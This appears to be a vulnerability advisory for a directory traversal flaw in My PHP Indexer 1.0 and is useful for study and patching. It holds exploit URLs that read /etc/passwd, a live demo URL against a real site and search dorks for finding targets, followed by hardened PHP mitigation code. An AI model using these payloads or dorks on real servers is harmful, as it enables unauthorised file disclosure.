Vendor: My PHP Indexer
By: JosS
CVSS: 6.4 MEDIUM
Local File Download
CWE: 22
Product Name: My PHP Indexer
Affected Version From: 1
Affected Version To: 1
Patch Exists: N/A
Related CWE: N/A
CPE: a:myphpindexer:my_php_indexer:1.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008
My PHP Indexer 1.0 (index.php) Local File Download Vulnerability
Depending on the server configuration, it may not be possible to traverse up the directory tree. The PoC is /index.php?d=[DIR]&f=[FILE], and the exploit is /index.php?d=../../../../../../../../../../../etc/&f=passwd or, with the traversal sequence URL-encoded, /index.php?d=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/&f=passwd. A live demo is http://www.bethesda.org.sg/resources/admin/index.php?d=%2e%2e%2f%2e%2e%2f%2e%2e%2f&f=index.php, and the dorks are "Powered by My PHP Indexer 1.0" and "priv8 :P".
Mitigation:
Ensure that the server configuration does not allow directory traversal.
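
One way to enforce this in the application itself rather than through server configuration alone, as an added example (not My PHP Indexer's own code, which this page does not show): a handler that accepts the same d and f parameters, resolves them with realpath() and serves the file only when it lies inside a base directory. BASE_DIR, its path and resolve_download() are hypothetical, and Unix-style paths are assumed.

```php
<?php
// Added example: hypothetical hardened download handler, not the product's code.
const BASE_DIR = '/var/www/files'; // assumed root of the indexed files

/**
 * Map the d (directory) and f (file) parameters to a real file inside $base.
 * Returns null when the request escapes $base or does not name a regular file.
 */
function resolve_download(string $base, string $dir, string $file): ?string
{
    // Reject NUL bytes up front; PHP 8 filesystem calls throw on them.
    if (strpos($dir . $file, "\0") !== false) {
        return null;
    }
    // f must be a single path component, never a path of its own.
    if ($file === '' || $file !== basename($file)) {
        return null;
    }
    $baseReal = realpath($base);
    if ($baseReal === false) {
        return null;
    }
    // PHP has already URL-decoded $_GET, so %2e%2e%2f arrives here as "../".
    // realpath() collapses those segments and resolves symlinks.
    $target = realpath($baseReal . '/' . $dir . '/' . $file);
    if ($target === false || !is_file($target)) {
        return null;
    }
    // Containment check; the trailing separator stops /var/www/files-old matching.
    $prefix = rtrim($baseReal, '/') . '/';
    return strncmp($target, $prefix, strlen($prefix)) === 0 ? $target : null;
}

$dir  = is_string($_GET['d'] ?? null) ? $_GET['d'] : '';
$file = is_string($_GET['f'] ?? null) ? $_GET['f'] : '';
$path = resolve_download(BASE_DIR, $dir, $file);
if ($path === null) {
    http_response_code(404); // same answer for "missing" and "outside base"
    exit;
}
header('Content-Type: application/octet-stream');
header('X-Content-Type-Options: nosniff');
header("Content-Disposition: attachment; filename*=UTF-8''" . rawurlencode(basename($path)));
header('Content-Length: ' . filesize($path));
readfile($path);
```

Because the check runs on the resolved path, the plain and percent-encoded forms of the traversal string are rejected by the same comparison. PHP's open_basedir setting can add a second, server-level restriction on top of this.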